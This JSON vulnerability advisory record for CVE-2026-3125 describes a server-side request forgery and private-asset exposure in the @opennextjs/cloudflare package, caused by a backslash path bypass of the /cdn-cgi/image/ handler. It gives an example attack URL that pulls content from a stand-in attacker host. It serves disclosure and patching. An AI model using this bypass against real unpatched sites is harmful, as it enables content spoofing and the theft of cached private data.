{
  "affected": [
    {
      "ranges": [
        {
          "database_specific": {
            "versions": [
              {
                "introduced": "0"
              },
              {
                "fixed": "1.17.1"
              }
            ]
          },
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "206794f1341023294147e7ef0b09146b7c7caaeb"
            }
          ],
          "repo": "https://github.com/opennextjs/opennextjs-cloudflare",
          "type": "GIT"
        }
      ]
    }
  ],
  "aliases": [
    "GHSA-rvpw-p7vw-wj3m"
  ],
  "details": "A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler. The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs.\n\nFor example: \n\n https://victim-site.com/cdn-cgi\\image/aaaa/https://attacker.com \n\nIn this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services.\n\nNote: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests.\n\nAdditionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.",
  "id": "CVE-2026-3125",
  "modified": "2026-04-01T23:08:36.874301969Z",
  "published": "2026-03-04T19:16:19.730Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://www.npmjs.com/package/@opennextjs/cloudflare/v/1.17.1"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-rvpw-p7vw-wj3m"
    },
    {
      "type": "ADVISORY",
      "url": "https://www.cve.org/cverecord?id=CVE-2025-6087"
    },
    {
      "type": "FIX",
      "url": "https://github.com/opennextjs/opennextjs-cloudflare/pull/1147"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}